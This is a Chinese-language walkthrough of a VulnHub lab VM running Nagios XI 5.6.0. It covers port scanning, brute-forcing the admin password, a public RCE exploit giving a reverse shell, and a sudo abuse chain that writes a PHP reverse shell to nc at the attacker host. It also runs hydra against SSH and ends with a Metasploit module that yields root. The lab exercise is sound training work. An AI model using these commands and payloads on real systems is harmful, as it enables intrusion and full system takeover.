靶機地址：https://download.vulnhub.com/monitoring/Monitoring.ova

---

1. 主機發(fā)現(xiàn)

目前只知道目標靶機在192.xx網段，通過如下的命令，看看這個網段上在線的主機。

$ nmap -sP 192.168.192.0/24

鎖定靶機IP地址為192.168.192.132.

2. 端口掃描

針對目標靶機進行端口掃描。

$ sudo nmap -p- 192.168.192.132

3. 服務枚舉

通過下面的命令掃描一下目標靶機開放端口上運行的服務。

$ sudo nmap -A -p22,25,80,389,443,5667 -sV -sT 192.168.192.132

4. 服務探查

服務不多，逐個試試看。

4.1 ssh服務

先試試22端口上的ssh服務。

$ ssh root@192.168.192.132

試了一下，可以訪問，這為后面的爆破提供了可能。

4.2 smtp服務

試試25端口上的smtp服務。

$ telnet 192.168.192.132 25

這個端口可以用，不過還不太會，上網搜索一番。

$ nc 192.168.192.132 25

返回250說明響應成功，使用EHLO可以查看支持的各種擴展列表。

EHLO 192.168.192.132

再進一步試一下。

嗯，看來是可以用的，并且存在一個root@localhost的郵箱，根據(jù)后面探查的結果再回來看。

4.3 http/https服務

直接用瀏覽器訪問一下。

可以訪問，不過不知道Nagios是個啥玩意兒，搜索了一下，貌似是一個在線監(jiān)控的工具。仔細瀏覽一下看看，發(fā)現(xiàn)有登錄頁面，如下圖。

隨便輸入登錄一下試試。

貌似沒法枚舉賬號，嘗試忘記密碼試試看。

額，貌似跟郵件系統(tǒng)有了關聯(lián)?？上б活D折騰也沒有搞定郵件系統(tǒng)。還是返回來進行目錄枚舉一下。

$ dirsearch -u http://192.168.192.132:80/

沒發(fā)現(xiàn)有用的內容，還是嘗試爆破一下root賬號試試看，結果也失敗了。還是上網看看有什么有用的信息吧。再官網上找到了一個安裝指南（https://assets.nagios.com/downloads/nagiosxi/docs/installation-manual-of-Nagios-XI-2024.pdf），這里面默認用了一個nagiosadmin的管理員賬號，如下圖。

嘗試用rockyou爆破一下這個賬號試試。

最后爆破出來的nagiosadmin用戶的密碼是admin，手工登錄看看。

登錄成功，版本為Nagios XI 5.6.0。直接searchsploit搜索一下這個版本上有啥可以利用的漏洞。

$ searchsploit “Nagios XI”

貌似可以利用的EXP還不少，我們倒著看編號為49422的RCE漏洞。
首先再kali上4444端口建立監(jiān)聽。

$ nc -lvnp 4444

然后按照腳本提示，直接執(zhí)行EXP。

$ python3 49422.py http://192.168.192.132 nagiosadmin admin 192.168.192.129 4444

順利突破了邊界，獲得了反彈shell，如下圖所示。

5. 系統(tǒng)提權

先優(yōu)化一下shell。

www-data@ubuntu:/usr/local/nagiosxi/html/admin$ whereis python
www-data@ubuntu:/usr/local/nagiosxi/html/admin$ /usr/bin/python3.5 -c "import  pty; pty.spawn('/bin/bash')"

5.1 枚舉系統(tǒng)信息

$ uname -a
$ cat /etc/*-release

是64位的ubuntu 16.04。

5.2 枚舉passwd文件

$ cat /etc/passwd | grep -v nologin

正常的shell用戶也不多。

5.3 枚舉定時任務

枚舉一下定時任務試試看。

沒有合適的。

5.4 linpeas提權

直接使用linpeas提取。

$ chmod u+x linpeas.sh
$ sh linpeas.sh

下圖所示的三個EXP是非常有可能的。

我們逐個試一下。

$ searchsploit -m 45010

然后在ubuntu 16.04上面編譯一下。

$ gcc 45010.c -o 45010

然后上傳到靶機的/tmp目錄下執(zhí)行一下試試看。

$ chmod u+x 45010
$ ./45010

提權失敗，再試試第二個。

第二個直接卡住了，再試試第三個。

第三個也是沒啥動靜，宣告失敗。
接著往下看，在sudo -l下面，有比較多有意思的內容，如下圖所示。

看不太懂，不太會用，上網搜索下，發(fā)現(xiàn)有篇文章對（https://www.tenable.com/security/research/tra-2020-61）這個有一些總結性說明?，F(xiàn)在嘗試一下。

$ sudo /usr/bin/php /usr/local/nagiosxi/html/includes/components/autodiscovery/scripts/autodiscover_new.php --addresses=127.0.0.1/1 --output=/usr/local/nagiosxi/html/includes/components/autodiscovery/scripts/autodiscover_new.php
$ sudo /usr/local/nagiosxi/scripts/manage_services.sh stop npcd
$ echo -e "user = nagios\ngroup = nagios\nlog_type = file\nlog_file = /usr/local/nagios/var/npcd.log\nmax_logfile_size = 10485760\nlog_level = 0\nperfdata_spool_dir = /usr/local/nagiosxi/scripts/components/\nperfdata_file_run_cmd = /usr/bin/curl\nperfdata_file_run_cmd_args = file:///usr/local/nagiosxi/html/includes/components/autodiscovery/jobs/autodiscover_new.php -o /usr/local/nagiosxi/html/includes/components/autodiscovery/scripts/autodiscover_new.php\nnpcd_max_threads = 5\nsleep_time = 15\nload_threshold = 10.0\npid_file=/usr/local/nagiosxi/var/subsys/npcd.pid\n\n# scrappy" > /usr/local/nagios/etc/pnp/npcd.cfg
$ echo -e "\x3c\x3fphp system('/bin/bash -i 2>&1 | nc 192.168.192.129 5555'); \x3f\x3e" > /usr/local/nagiosxi/html/includes/components/autodiscovery/jobs/autodiscover_new.php
$ sudo /usr/local/nagiosxi/scripts/manage_services.sh start npcd
$ sudo /usr/bin/php /usr/local/nagiosxi/html/includes/components/autodiscovery/scripts/autodiscover_new.php test

可惜的是，監(jiān)聽一直反彈成功。從好多的現(xiàn)象來看，nagios用戶的權限貌似比www-data要高，想辦法切換到nagios用戶試試看，直接用hydra爆破一下。

$ hydra -l nagios -P ../../rockyou.txt -vV -e ns 192.168.192.132 ssh

半天也沒有結果，看來得想其它辦法了。利用神器metasploit試試看。

$ msfconsole
msf6 > search nagios

看不太懂，不管了把Rank為Excellent并且Check為Yes的都試一下。
最后發(fā)現(xiàn)行號為19的EXP可以成功，如下所示。

msf6 > use exploit/linux/http/nagios_xi_plugins_check_plugin_authenticated_rce
msf6 exploit(linux/http/nagios_xi_plugins_check_plugin_authenticated_rce) > show options
msf6 exploit(linux/http/nagios_xi_plugins_check_plugin_authenticated_rce) > set PASSWORD admin
msf6 exploit(linux/http/nagios_xi_plugins_check_plugin_authenticated_rce) > set RHOSTS 192.168.192.132
msf6 exploit(linux/http/nagios_xi_plugins_check_plugin_authenticated_rce) > set LHOST 192.168.192.129
msf6 exploit(linux/http/nagios_xi_plugins_check_plugin_authenticated_rce) > run

直接進來就是root權限，這個EXP比較牛逼。

6. 獲取flag

成功獲得flag，本次打靶到此結束。